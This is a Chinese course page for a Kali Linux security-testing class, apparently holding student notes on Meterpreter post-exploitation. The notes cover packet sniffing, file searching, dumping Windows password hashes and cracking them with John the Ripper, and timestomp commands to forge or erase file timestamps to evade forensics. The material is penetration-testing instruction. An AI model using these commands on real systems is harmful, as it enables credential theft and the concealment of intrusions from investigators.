846人加入学习
(36人评价)
Kali Linux安全测试

爆款好课 NO.1

价格 ¥ 599.00
该课程属于 武官课程 请加入后再学习

meterpreter在内存里运行

抓包

load sniffer

启动一个缓存区块来存储数据包(5000)

load sniffer
sniffer_interfaces
sniffer_start 2
sniffer_dump 2 1.cap
/ sniffer_dump 2 1.cap

自动过滤meterpreter流量,全程使用 SSL/TLS加密

 

用msf解数据包

use auxiliary/sniffer/psnuffle

set PCAPFILE 1.cap

 

搜索文件

search -f *.ini

空格需要加转义符
search -d c:\\documents\ and\settings\\administrator\\desktop\\ -f *.docx

 

密码破解

获取hash,得有system权限,结果在tmp下

use post/windows/gather/hashdump

破解 John the Ripper

use auxiliary/analyze/jtr_crack_fast

自动调用tmp里的hash

 

文件系统访问会留下痕迹,电子取证重点关注

访问文件系统就如在雪地上行走

避免被电子取证发现,不要碰文件系统,meterpreter先天优势,完全基于内存

 MAC时间(Modified 修改/Accessed 最后访问查看时间/Changed 属性修改记录)

MACE:MFT entry 微软下有,mft的项

MFT:主文件分配表,通常在最前的分区,通常1024字节或两个硬盘扇区,其中存放多项entry信息,包含大量信息(大小 名称 目录位置 磁盘位置 创建时间)

 

查看

ls -l --time=atime/mtime/ctime 1.txt

stat 1.txt

修改时间

touch -d "2 days ago" 1.txt
touch -t 1501010101 1.txt

msf的修改工具

Timestomp (meterpreter)

timestomp -v 1.txt 查看

timestomp -f c:\\autoexec.bat 1.txt 从模板提取时间出了修改到目标

timestomp -z "MM/DD/YYYY HH24:MI:SS" 2.txt 手动的修改某个时间 -m / -a / -c / -e / -z

-b 擦除MACE -r 递归一个目录,全部擦掉

 

[展开全文]